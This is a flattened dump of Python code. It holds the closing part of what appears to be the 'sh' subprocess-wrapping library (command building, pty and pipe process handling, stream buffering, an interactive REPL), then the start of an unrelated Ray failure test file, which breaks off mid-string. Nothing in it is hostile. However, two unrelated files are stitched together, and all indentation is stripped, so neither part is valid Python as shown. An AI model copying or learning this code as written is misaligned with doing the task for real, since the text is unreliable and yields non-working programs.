return getattr(unicode(self), p)
def __repr__(self):
try: return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout: return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
class Command(object):
_prepend_stack = []
_call_args = {
# currently unsupported
#"fg": False, # run command in foreground
"bg": False, # run command in background
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024**2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": "utf8",
# how long the process should run before it is auto-killed
"timeout": 0,
}
# these are arguments that cannot be called together, because they wouldn't
# make any sense
_incompatible_call_args = (
#("fg", "bg", "Command can't be run in the foreground and background"),
("err", "err_to_out", "Stderr is already being redirected"),
("piped", "iter", "You cannot iterate when this command is being piped"),
)
@classmethod
def _create(cls, program):
path = resolve_program(program)
if not path: raise CommandNotFound(program)
return cls(path)
def __init__(self, path):
self._path = path
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
if name.startswith("_"): return getattr(name)
if name == "bake": return getattr("bake")
return getattr("bake")(name)
@staticmethod
def _extract_call_args(kwargs, to_override={}):
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
elif parg in to_override:
call_args[parg] = to_override[parg]
# test for incompatible call args
s1 = set(call_args.keys())
for args in Command._incompatible_call_args:
args = list(args)
error = args.pop()
if s1.issuperset(args):
raise TypeError("Invalid special arguments %r: %s" % (args, error))
return call_args, kwargs
def _format_arg(self, arg):
if IS_PY3: arg = str(arg)
else: arg = unicode(arg).encode("utf8")
return arg
def _compile_args(self, args, kwargs):
processed_args = []
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if not arg:
warnings.warn("Empty list passed as an argument to %r. \
If you're using glob.glob(), please use sh.glob() instead." % self.path, stacklevel=3)
for sub_arg in arg: processed_args.append(self._format_arg(sub_arg))
else: processed_args.append(self._format_arg(arg))
# aggregate the keyword arguments
for k,v in kwargs.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
processed_args.append("-"+k)
if v is not True: processed_args.append(self._format_arg(v))
# we're doing a long arg
else:
k = k.replace("_", "-")
if v is True: processed_args.append("--"+k)
else: processed_args.append("--%s=%s" % (k, self._format_arg(v)))
return processed_args
def bake(self, *args, **kwargs):
fn = Command(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k,v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError: continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
fn._partial_baked_args.extend(self._compile_args(args, kwargs))
return fn
def __str__(self):
if IS_PY3: return self.__unicode__()
else: return unicode(self).encode("utf8")
def __eq__(self, other):
try: return str(self) == str(other)
except: return False
def __repr__(self):
return str(self)
def __unicode__(self):
baked_args = " ".join(self._partial_baked_args)
if baked_args: baked_args = " " + baked_args
return self._path + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
Command._prepend_stack.pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
cmd = []
# aggregate any 'with' contexts
call_args = Command._call_args.copy()
for prepend in self._prepend_stack:
# don't pass the 'with' call arg
pcall_args = prepend.call_args.copy()
try: del pcall_args["with"]
except: pass
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
tmp_call_args, kwargs = self._extract_call_args(kwargs, self._partial_call_args)
call_args.update(tmp_call_args)
if not isinstance(call_args["ok_code"], (tuple, list)):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
# it makes sense that if the input pipe of a command is running
# in the background, then this command should run in the
# background as well
if first_arg.call_args["bg"]: call_args["bg"] = True
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = self._compile_args(args, kwargs)
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# stdout redirection
stdout = call_args["out"]
if stdout \
and not callable(stdout) \
and not hasattr(stdout, "write") \
and not isinstance(stdout, (cStringIO, StringIO)):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if stderr and not callable(stderr) and not hasattr(stderr, "write") \
and not isinstance(stderr, (cStringIO, StringIO)):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
# used in redirecting
STDOUT = -1
STDERR = -2
# Process open = Popen
# Open Process = OProc
class OProc(object):
_procs_to_cleanup = []
_registered_cleanup = False
_default_window_size = (24, 80)
def __init__(self, cmd, stdin, stdout, stderr, call_args,
persist=False, pipe=STDOUT):
self.call_args = call_args
self._single_tty = self.call_args["tty_in"] and self.call_args["tty_out"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if self._single_tty:
self._stdin_fd, self._slave_stdin_fd = pty.openpty()
self._stdout_fd = self._stdin_fd
self._slave_stdout_fd = self._slave_stdin_fd
self._stderr_fd = self._stdin_fd
self._slave_stderr_fd = self._slave_stdin_fd
# do not consolidate stdin and stdout
else:
if self.call_args["tty_in"]:
self._slave_stdin_fd, self._stdin_fd = pty.openpty()
else:
self._slave_stdin_fd, self._stdin_fd = os.pipe()
# tty_out is usually the default
if self.call_args["tty_out"]:
self._stdout_fd, self._slave_stdout_fd = pty.openpty()
else:
self._stdout_fd, self._slave_stdout_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is not STDOUT:
self._stderr_fd, self._slave_stderr_fd = os.pipe()
self.pid = os.fork()
# child
if self.pid == 0:
# this piece of ugliness is due to a bug where we can lose output
# if we do os.close(self._slave_stdout_fd) in the parent after
# the child starts writing.
# see http://bugs.python.org/issue15898
if IS_OSX and IS_PY3: _time.sleep(0.01)
os.setsid()
if self.call_args["tty_out"]:
# set raw mode, so there isn't any weird translation of newlines
# to \r\n and other oddities. we're not outputting to a terminal
# anyways
#
# we HAVE to do this here, and not in the parent thread, because
# we have to guarantee that this is set before the child process
# is run, and we can't do it twice.
tty.setraw(self._stdout_fd)
os.close(self._stdin_fd)
if not self._single_tty:
os.close(self._stdout_fd)
if stderr is not STDOUT: os.close(self._stderr_fd)
if self.call_args["cwd"]: os.chdir(self.call_args["cwd"])
os.dup2(self._slave_stdin_fd, 0)
os.dup2(self._slave_stdout_fd, 1)
# we're not directing stderr to stdout? then set self._slave_stderr_fd to
# fd 2, the common stderr fd
if stderr is STDOUT: os.dup2(self._slave_stdout_fd, 2)
else: os.dup2(self._slave_stderr_fd, 2)
# don't inherit file descriptors
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
os.closerange(3, max_fd)
# set our controlling terminal
if self.call_args["tty_out"]:
tmp_fd = os.open(os.ttyname(1), os.O_RDWR)
os.close(tmp_fd)
if self.call_args["tty_out"]:
self.setwinsize(1)
# actually execute the process
if self.call_args["env"] is None: os.execv(cmd[0], cmd)
else: os.execve(cmd[0], cmd, self.call_args["env"])
os._exit(255)
# parent
else:
if not OProc._registered_cleanup:
atexit.register(OProc._cleanup_procs)
OProc._registered_cleanup = True
self.started = _time.time()
self.cmd = cmd
self.exit_code = None
self._done_callbacks = []
self.stdin = stdin or Queue()
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=self.call_args["internal_bufsize"])
self._stderr = deque(maxlen=self.call_args["internal_bufsize"])
if self.call_args["tty_in"]: self.setwinsize(self._stdin_fd)
self.log = logging.getLogger("process %r" % self)
os.close(self._slave_stdin_fd)
if not self._single_tty:
os.close(self._slave_stdout_fd)
if stderr is not STDOUT: os.close(self._slave_stderr_fd)
if logging_enabled: self.log.debug("started process")
if not persist: OProc._procs_to_cleanup.append(self)
if self.call_args["tty_in"]:
attr = termios.tcgetattr(self._stdin_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = StreamWriter("stdin", self, self._stdin_fd,
self.stdin, self.call_args["in_bufsize"])
stdout_pipe = self._pipe_queue if pipe is STDOUT else None
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
self._stdout_stream = StreamReader("stdout", self, self._stdout_fd, stdout,
self._stdout, self.call_args["out_bufsize"], stdout_pipe)
if stderr is STDOUT or self._single_tty: self._stderr_stream = None
else:
stderr_pipe = self._pipe_queue if pipe is STDERR else None
self._stderr_stream = StreamReader("stderr", self, self._stderr_fd, stderr,
self._stderr, self.call_args["err_bufsize"], stderr_pipe)
# start the main io threads
self._input_thread = self._start_thread(self.input_thread, self._stdin_stream)
self._output_thread = self._start_thread(self.output_thread, self._stdout_stream, self._stderr_stream)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd)
# also borrowed from pexpect.py
@staticmethod
def setwinsize(fd):
rows, cols = OProc._default_window_size
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735: # L is not required in Python >= 2.2.
TIOCSWINSZ = -2146929561 # Same bits, but with sign.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
@staticmethod
def _start_thread(fn, *args):
thrd = threading.Thread(target=fn, args=args)
thrd.daemon = True
thrd.start()
return thrd
def in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def err_bufsize(self, buf):
if self._stderr_stream:
self._stderr_stream.stream_bufferer.change_buffering(buf)
def input_thread(self, stdin):
done = False
while not done and self.alive:
if logging_enabled: self.log.debug("%r ready for more input", stdin)
done = stdin.write()
stdin.close()
def output_thread(self, stdout, stderr):
readers = []
errors = []
if stdout is not None:
readers.append(stdout)
errors.append(stdout)
if stderr is not None:
readers.append(stderr)
errors.append(stderr)
while readers:
outputs, inputs, err = select.select(readers, [], errors, 0.1)
# stdout and stderr
for stream in outputs:
if logging_enabled: self.log.debug("%r ready to be read from", stream)
done = stream.read()
if done: readers.remove(stream)
for stream in err:
pass
# test if the process has been running too long
if self.call_args["timeout"]:
now = _time.time()
if now - self.started > self.call_args["timeout"]:
if logging_enabled: self.log.debug("we've been running too long")
self.kill()
# this is here because stdout may be the controlling TTY, and
# we can't close it until the process has ended, otherwise the
# child will get SIGHUP. typically, if we've broken out of
# the above loop, and we're here, the process is just about to
# end, so it's probably ok to aggressively poll self.alive
#
# the other option to this would be to do the CTTY close from
# the method that does the actual os.waitpid() call, but the
# problem with that is that the above loop might still be
# running, and closing the fd will cause some operation to
# fail. this is less complex than wrapping all the ops
# in the above loop with out-of-band fd-close exceptions
while self.alive: _time.sleep(0.001)
if stdout: stdout.close()
if stderr: stderr.close()
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def signal(self, sig):
if logging_enabled: self.log.debug("sending signal %d", sig)
try: os.kill(self.pid, sig)
except OSError: pass
def kill(self):
if logging_enabled: self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
if logging_enabled: self.log.debug("terminating")
self.signal(signal.SIGTERM)
@staticmethod
def _cleanup_procs():
for proc in OProc._procs_to_cleanup:
proc.kill()
proc.wait()
def _handle_exit_code(self, exit_code):
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code): return -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code): return os.WEXITSTATUS(exit_code)
else: raise RuntimeError("Unknown child exit status!")
@property
def alive(self):
if self.exit_code is not None: return False
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None: return False
return True
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process
pid, exit_code = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = self._handle_exit_code(exit_code)
return False
# no child process
except OSError: return False
else: return True
finally: self._wait_lock.release()
def wait(self):
if logging_enabled: self.log.debug("acquiring wait lock to wait for completion")
with self._wait_lock:
if logging_enabled: self.log.debug("got wait lock")
if self.exit_code is None:
if logging_enabled: self.log.debug("exit code not set, waiting on pid")
pid, exit_code = os.waitpid(self.pid, 0)
self.exit_code = self._handle_exit_code(exit_code)
else:
if logging_enabled: self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
self._input_thread.join()
self._output_thread.join()
for cb in self._done_callbacks: cb()
return self.exit_code
class DoneReadingStdin(Exception): pass
class NoStdinData(Exception): pass
# this guy is for reading from some input (the stream) and writing to our
# opened process's stdin fd. the stream can be a Queue, a callable, something
# with the "read" method, a string, or an iterable
class StreamWriter(object):
def __init__(self, name, process, stream, stdin, bufsize):
self.name = name
self.process = process
self.stream = stream
self.stdin = stdin
self.log = logging.getLogger(repr(self))
self.stream_bufferer = StreamBufferer(self.process.call_args["encoding"],
bufsize)
# determine buffering for reading from the input we set for stdin
if bufsize == 1: self.bufsize = 1024
elif bufsize == 0: self.bufsize = 1
else: self.bufsize = bufsize
if isinstance(stdin, Queue):
log_msg = "queue"
self.get_chunk = self.get_queue_chunk
elif callable(stdin):
log_msg = "callable"
self.get_chunk = self.get_callable_chunk
# also handles stringio
elif hasattr(stdin, "read"):
log_msg = "file descriptor"
self.get_chunk = self.get_file_chunk
elif isinstance(stdin, basestring):
log_msg = "string"
if bufsize == 1:
# TODO, make the split() be a generator
self.stdin = iter((c+"\n" for c in stdin.split("\n")))
else:
self.stdin = iter(stdin[i:i+self.bufsize] for i in range(0, len(stdin), self.bufsize))
self.get_chunk = self.get_iter_chunk
else:
log_msg = "general iterable"
self.stdin = iter(stdin)
self.get_chunk = self.get_iter_chunk
if logging_enabled: self.log.debug("parsed stdin as a %s", log_msg)
def __repr__(self):
return "<StreamWriter %s for %r>" % (self.name, self.process)
def fileno(self):
return self.stream
def get_queue_chunk(self):
try: chunk = self.stdin.get(True, 0.01)
except Empty: raise NoStdinData
if chunk is None: raise DoneReadingStdin
return chunk
def get_callable_chunk(self):
try: return self.stdin()
except: raise DoneReadingStdin
def get_iter_chunk(self):
try:
if IS_PY3: return self.stdin.__next__()
else: return self.stdin.next()
except StopIteration: raise DoneReadingStdin
def get_file_chunk(self):
if self.stream_bufferer.type == 1: chunk = self.stdin.readline()
else: chunk = self.stdin.read(self.bufsize)
if not chunk: raise DoneReadingStdin
else: return chunk
# the return value answers the questions "are we done writing forever?"
def write(self):
# get_chunk may sometimes return bytes, and sometimes returns trings
# because of the nature of the different types of STDIN objects we
# support
try: chunk = self.get_chunk()
except DoneReadingStdin:
if logging_enabled: self.log.debug("done reading")
if self.process.call_args["tty_in"]:
# EOF time
try: char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except: char = chr(4).encode()
os.write(self.stream, char)
return True
except NoStdinData:
if logging_enabled: self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.process.call_args["encoding"])
for chunk in self.stream_bufferer.process(chunk):
if logging_enabled: self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
if logging_enabled: self.log.debug("writing chunk to process")
try:
os.write(self.stream, chunk)
except OSError:
if logging_enabled: self.log.debug("OSError writing stdin chunk")
return True
def close(self):
if logging_enabled: self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
if logging_enabled: self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk: os.write(self.stream, chunk)
if not self.process.call_args["tty_in"]:
if logging_enabled: self.log.debug("we used a TTY, so closing the stream")
os.close(self.stream)
except OSError: pass
class StreamReader(object):
def __init__(self, name, process, stream, handler, buffer, bufsize, pipe_queue=None):
self.name = name
self.process = process
self.stream = stream
self.buffer = buffer
self.pipe_queue = pipe_queue
self.log = logging.getLogger(repr(self))
self.stream_bufferer = StreamBufferer(self.process.call_args["encoding"],
bufsize)
# determine buffering
if bufsize == 1: self.bufsize = 1024
elif bufsize == 0: self.bufsize = 1
else: self.bufsize = bufsize
# here we're determining the handler type by doing some basic checks
# on the handler object
self.handler = handler
if callable(handler): self.handler_type = "fn"
elif isinstance(handler, StringIO): self.handler_type = "stringio"
elif isinstance(handler, cStringIO):
self.handler_type = "cstringio"
elif hasattr(handler, "write"): self.handler_type = "fd"
else: self.handler_type = None
self.should_quit = False
# here we choose how to call the callback, depending on how many
# arguments it takes. the reason for this is to make it as easy as
# possible for people to use, without limiting them. a new user will
# assume the callback takes 1 argument (the data). as they get more
# advanced, they may want to terminate the process, or pass some stdin
# back, and will realize that they can pass a callback of more args
if self.handler_type == "fn":
implied_arg = 0
if inspect.ismethod(handler):
implied_arg = 1
num_args = len(inspect.getargspec(handler).args)
else:
if inspect.isfunction(handler):
num_args = len(inspect.getargspec(handler).args)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = len(inspect.getargspec(handler.__call__).args)
self.handler_args = ()
if num_args == implied_arg + 2: self.handler_args = (self.process.stdin,)
elif num_args == implied_arg + 3: self.handler_args = (self.process.stdin, self.process)
def fileno(self):
return self.stream
def __repr__(self):
return "<StreamReader %s for %r>" % (self.name, self.process)
def close(self):
chunk = self.stream_bufferer.flush()
if logging_enabled: self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk: self.write_chunk(chunk)
if self.handler_type == "fd" and hasattr(self.handler, "close"):
self.handler.flush()
if self.pipe_queue: self.pipe_queue.put(None)
try: os.close(self.stream)
except OSError: pass
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if self.handler_type == "fn" and not self.should_quit:
# try to use the encoding first, if that doesn't work, send
# the bytes
try: to_handler = chunk.decode(self.process.call_args["encoding"])
except UnicodeDecodeError: to_handler = chunk
self.should_quit = self.handler(to_handler, *self.handler_args)
elif self.handler_type == "stringio":
self.handler.write(chunk.decode(self.process.call_args["encoding"]))
elif self.handler_type in ("cstringio", "fd"):
self.handler.write(chunk)
if self.pipe_queue:
if logging_enabled: self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue.put(chunk)
self.buffer.append(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try: chunk = os.read(self.stream, self.bufsize)
except OSError as e:
if logging_enabled: self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
if logging_enabled: self.log.debug("got no chunk, done reading")
return True
if logging_enabled: self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
# this is used for feeding in chunks of stdout/stderr, and breaking it up into
# chunks that will actually be put into the internal buffers. for example, if
# you have two processes, one being piped to the other, and you want that,
# first process to feed lines of data (instead of the chunks however they
# come in), OProc will use an instance of this class to chop up the data and
# feed it as lines to be sent down the pipe
class StreamBufferer(object):
def __init__(self, encoding="utf8", buffer_type=1):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might chance the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = logging.getLogger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
if logging_enabled: self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0: self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
if logging_enabled: self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# we've encountered binary, permanently switch to N size buffering
# since matching on newline doesn't make sense anymore
if self.type == 1:
try: chunk.decode(self.encoding)
except:
if logging_enabled: self.log.debug("detected binary data, changing buffering")
self.change_buffering(1024)
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
chunk = chunk.decode(self.encoding)
while True:
newline = chunk.find("\n")
if newline == -1: break
chunk_to_write = chunk[:newline+1]
if self.buffer:
# this is ugly, but it's designed to take the existing
# bytes buffer, join it together, tack on our latest
# chunk, then convert the whole thing to a string.
# it's necessary, i'm sure. read the whole block to
# see why.
chunk_to_write = "".encode(self.encoding).join(self.buffer) \
+ chunk_to_write.encode(self.encoding)
chunk_to_write = chunk_to_write.decode(self.encoding)
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline+1:]
total_to_write.append(chunk_to_write.encode(self.encoding))
if chunk:
self.buffer.append(chunk.encode(self.encoding))
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
if logging_enabled: self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for flushing buffer")
# this allows lookups to names that aren't found in the global scope to be
# searched for as a program name. for example, if "ls" isn't found in this
# module's scope, we consider it a system program and try to find it.
class Environment(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self["Command"] = Command
self["CommandNotFound"] = CommandNotFound
self["ErrorReturnCode"] = ErrorReturnCode
self["ARGV"] = sys.argv[1:]
for i, arg in enumerate(sys.argv):
self["ARG%d" % i] = arg
# this needs to be last
self["env"] = os.environ
def __setitem__(self, k, v):
# are we altering an environment variable?
if "env" in self and k in self["env"]: self["env"][k] = v
# no? just setting a regular name
else: dict.__setitem__(self, k, v)
def __missing__(self, k):
# the only way we'd get to here is if we've tried to
# import * from a repl. so, raise an exception, since
# that's really the only sensible thing to do
if k == "__all__":
raise ImportError("Cannot import * from sh. \
Please import sh or import programs individually.")
# if we end with "_" just go ahead and skip searching
# our namespace for python stuff. this was mainly for the
# command "id", which is a popular program for finding
# if a user exists, but also a python function for getting
# the address of an object. so can call the python
# version by "id" and the program version with "id_"
if not k.endswith("_"):
# check if we're naming a dynamically generated ReturnCode exception
try: return rc_exc_cache[k]
except KeyError:
m = rc_exc_regex.match(k)
if m: return get_rc_exc(int(m.group(1)))
# are we naming a commandline argument?
if k.startswith("ARG"):
return None
# is it a builtin?
try: return getattr(self["__builtins__"], k)
except AttributeError: pass
elif not k.startswith("_"): k = k.rstrip("_")
# how about an environment variable?
try: return os.environ[k]
except KeyError: pass
# is it a custom builtin?
builtin = getattr(self, "b_"+k, None)
if builtin: return builtin
# it must be a command then
return Command._create(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path):
os.chdir(path)
def b_which(self, program):
return which(program)
def run_repl(env):
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try: line = raw_input("sh> ")
except (ValueError, EOFError): break
try: exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit: break
except: print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr))
self.self_module = self_module
self.env = Environment(globals())
def __getattr__(self, name):
return self.env[name]
# we're being run as a stand-alone script
if __name__ == "__main__":
try: arg = sys.argv.pop(1)
except: arg = None
if arg == "test":
import subprocess
def run_test(version):
py_version = "python%s" % version
py_bin = which(py_version)
if py_bin:
print("Testing %s" % py_version.capitalize())
p = subprocess.Popen([py_bin, os.path.join(THIS_DIR, "test.py")]
+ sys.argv[1:])
p.wait()
else:
print("Couldn't find %s, skipping" % py_version.capitalize())
versions = ("2.6", "2.7", "3.1", "3.2")
for version in versions: run_test(version)
else:
globs = globals()
f_globals = {}
for k in ["__builtins__", "__doc__", "__name__", "__package__"]:
f_globals[k] = globs[k]
env = Environment(f_globals)
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
|
failure_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import pytest
import sys
import tempfile
import threading
import time
import numpy as np
import redis
import ray
import ray.ray_constants as ray_constants
from ray.utils import _random_string
from ray.test.cluster_utils import Cluster
def relevant_errors(error_type):
return [info for info in ray.error_info() if info["type"] == error_type]
def wait_for_errors(error_type, num_errors, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(relevant_errors(error_type)) >= num_errors:
return
time.sleep(0.1)
raise Exception("Timing out of wait.")
@pytest.fixture
def ray_start_regular():
# Start the Ray processes.
ray.init(num_cpus=2)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
